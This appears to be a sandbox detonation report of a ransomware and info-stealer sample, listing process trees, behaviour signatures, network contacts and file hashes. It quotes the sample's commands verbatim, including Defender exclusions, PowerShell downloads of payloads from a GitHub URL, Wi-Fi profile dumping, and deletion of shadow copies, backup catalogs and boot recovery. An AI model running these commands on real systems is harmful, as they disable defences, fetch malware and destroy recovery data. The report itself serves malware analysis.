PID 2348 wrote to memory of 1872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1420 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1420 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1420 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1420 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1420 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4400 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4400 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4400 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4400 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4400 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4400 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4400 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4400 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4400 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4004 wrote to memory of 2844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4004 wrote to memory of 2844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4004 wrote to memory of 2844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4004 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4004 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4004 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2828 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2828 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4292 wrote to memory of 624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4292 wrote to memory of 624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4292 wrote to memory of 3124 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4292 wrote to memory of 3124 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2828 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2828 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 1680 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1680 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1680 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1680 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2828 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2828 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 3900 wrote to memory of 3448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3900 wrote to memory of 3448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2828 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE
PID 2828 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3412 -ip 3412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 2472

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/1868-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/2576-3-0x00007FFBBC543000-0x00007FFBBC545000-memory.dmp

memory/2576-9-0x0000024704A60000-0x0000024704A82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55yv0lv5.2wm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2576-14-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

memory/2576-15-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

memory/2576-18-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ada23d35e4a3f1bc35ac8d393cd02675
SHA1 88dd6ddecec82aeafba2b6368078c7c70b88fcac
SHA256 98d17949831dda7243aa8b24a66443eee75d0805996826290fbe1a75bfc79e72
SHA512 0acae33f83787122b779b8b1b41580f4595eb44c74ef0035949e3d90103fd22e15ed4af4238985bd58f8a0378dc8bce4d77549ca4bb661c2c515018be99a79e6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6167e0b3b1bfe7811333fb0ff4260abb
SHA1 3ff0163e7819457a077316365ddbf19d8b4ea8f7
SHA256 7550ba7b917b7671dcb9783f7acb31854880f1fa845d7496ad27e013d70f4364
SHA512 d0bc4f05c0eea70d441eef08f77495a1aea546c679c99e75eec34d1d5dc6c2ae2ddc7f1fadae515a74e8d8e90d493ab68c5ea24f33878491250ebd994cd061a5

memory/1868-42-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA512 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

memory/2024-49-0x00000000008E0000-0x0000000000908000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 b6054dbe4ed853c2e35291f045a632ba
SHA1 1355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256 b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512 648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 43b0b5c58203d453fd8d31d936d5e6df
SHA1 9e4b7869c15801e1a86c1319919523fe4bd6c841
SHA256 df3e0f7f7ef55cb398b3c25cdc9d0aa5a2868b5ab528d121b4e0146c1fb4b6fb
SHA512 816ebd495eea2f729d79f49b14e7698d32bc563d6569098acc45f0d12e8f8cf10abd2cfdd28a98e7a2798f05dac10d58d04ab89c269598b5a8181feb8fe8ee83

memory/3412-62-0x00000000000D0000-0x000000000010C000-memory.dmp

memory/3412-64-0x00000000048E0000-0x00000000048F2000-memory.dmp

memory/1868-65-0x0000000140000000-0x0000000140028000-memory.dmp

memory/3412-66-0x0000000004AD0000-0x0000000004C92000-memory.dmp

memory/3412-67-0x0000000005A50000-0x0000000005F7C000-memory.dmp

memory/3412-68-0x0000000006400000-0x0000000006466000-memory.dmp

memory/3412-69-0x0000000006610000-0x00000000066A2000-memory.dmp

memory/3412-120-0x00000000070C0000-0x0000000007664000-memory.dmp

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA512 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

MD5 d1457b72c3fb323a2671125aef3eab5d
SHA1 5bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA256 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512 ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 ea511fc534efd031f852fcf490b76104
SHA1 573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256 e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512 f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 062e358575f650b17d5537a547dba62d
SHA1 b396fb8e5fad0bd3c0e25bcdc511c02c8048f125
SHA256 62457dcf70b8b1c72574ed4acfa8041830554bb005f72564efa8b4d7e5815b02
SHA512 87e74e1d92767823acdb228241ec4081a168de0d9f48472b6a38eee08891e5fb1d629544c9720290bb8cc64b637aa5b3108ee738c291c4f6c6905686358f3e0e

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-22 05:53

Reported

2025-03-22 05:55

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2680 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2760 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2760 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2796 wrote to memory of 2888 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 2888 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 2888 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2760 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

Network

N/A

Files

memory/2680-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/2880-7-0x000007FEF468E000-0x000007FEF468F000-memory.dmp

memory/2880-8-0x000000001B780000-0x000000001BA62000-memory.dmp

memory/2880-9-0x0000000002910000-0x0000000002918000-memory.dmp

memory/2880-10-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-11-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-12-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-13-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-14-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9e6c51a3f6886d64fc6dfcfc4f376fb4
SHA1 da9e5844939fd2b6d823870bb483ecf63855b440
SHA256 7a8239e7feee11f3922e57d89df79f9085aea7a1b29aca255eaab35880badb24
SHA512 e5f3b4f5ddb515fd5d69f93c21313c18dc0cbe93785b2385f370c2fa8f77acd7c27c67880d25f884037654af8e3fe11b983139d18632b56ece1fd1c5ed223b79

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2584-21-0x000000001B740000-0x000000001BA22000-memory.dmp

memory/2584-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2680-28-0x0000000140000000-0x0000000140028000-memory.dmp